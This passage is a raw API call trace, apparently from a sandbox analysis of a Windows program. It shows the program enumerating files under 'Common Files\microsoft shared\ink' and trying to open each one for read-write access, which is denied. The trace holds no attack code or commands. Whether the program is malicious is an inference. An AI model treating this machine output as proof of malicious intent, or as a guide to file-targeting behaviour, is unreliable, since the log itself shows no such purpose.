Files\\microsoft shared\\ink\\uk-UA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.978] GetLastError () returned 0x5 [0100.978] GetLastError () returned 0x5 [0100.978] SetLastError (dwErrCode=0x5) [0100.978] GetLastError () returned 0x5 [0100.978] SetLastError (dwErrCode=0x5) [0100.978] GetLastError () returned 0x5 [0100.978] SetLastError (dwErrCode=0x5) [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0100.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.978] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0100.978] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x77fd0 [0100.978] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.978] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0100.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.979] AreFileApisANSI () returned 1 [0100.979] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0100.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.980] AreFileApisANSI () returned 1 [0100.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85760 [0100.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 73 [0100.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.980] GetFileType (hFile=0x27c) returned 0x1 [0100.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0100.980] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.980] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.981] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.981] CloseHandle (hObject=0x27c) returned 1 [0100.981] AreFileApisANSI () returned 1 [0100.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.981] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui") returned 73 [0100.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.981] GetLastError () returned 0x5 [0100.981] GetLastError () returned 0x5 [0100.981] SetLastError (dwErrCode=0x5) [0100.981] GetLastError () returned 0x5 [0100.981] SetLastError (dwErrCode=0x5) [0100.981] GetLastError () returned 0x5 [0100.981] SetLastError (dwErrCode=0x5) [0100.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.981] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0100.981] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c658, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.982] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.982] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.982] AreFileApisANSI () returned 1 [0100.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN", lpUsedDefaultChar=0x0) returned 57 [0100.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.983] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.983] AreFileApisANSI () returned 1 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 57 [0100.983] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.983] GetLastError () returned 0x5 [0100.983] GetLastError () returned 0x5 [0100.983] SetLastError (dwErrCode=0x5) [0100.983] GetLastError () returned 0x5 [0100.983] SetLastError (dwErrCode=0x5) [0100.983] GetLastError () returned 0x5 [0100.983] SetLastError (dwErrCode=0x5) [0100.983] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.983] AreFileApisANSI () returned 1 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0100.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN") returned 57 [0100.984] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.984] GetLastError () returned 0x5 [0100.984] GetLastError () returned 0x5 [0100.984] SetLastError (dwErrCode=0x5) [0100.984] GetLastError () returned 0x5 [0100.984] SetLastError (dwErrCode=0x5) [0100.984] GetLastError () returned 0x5 [0100.984] SetLastError (dwErrCode=0x5) [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.984] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.984] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.984] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.984] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.985] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.985] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.985] 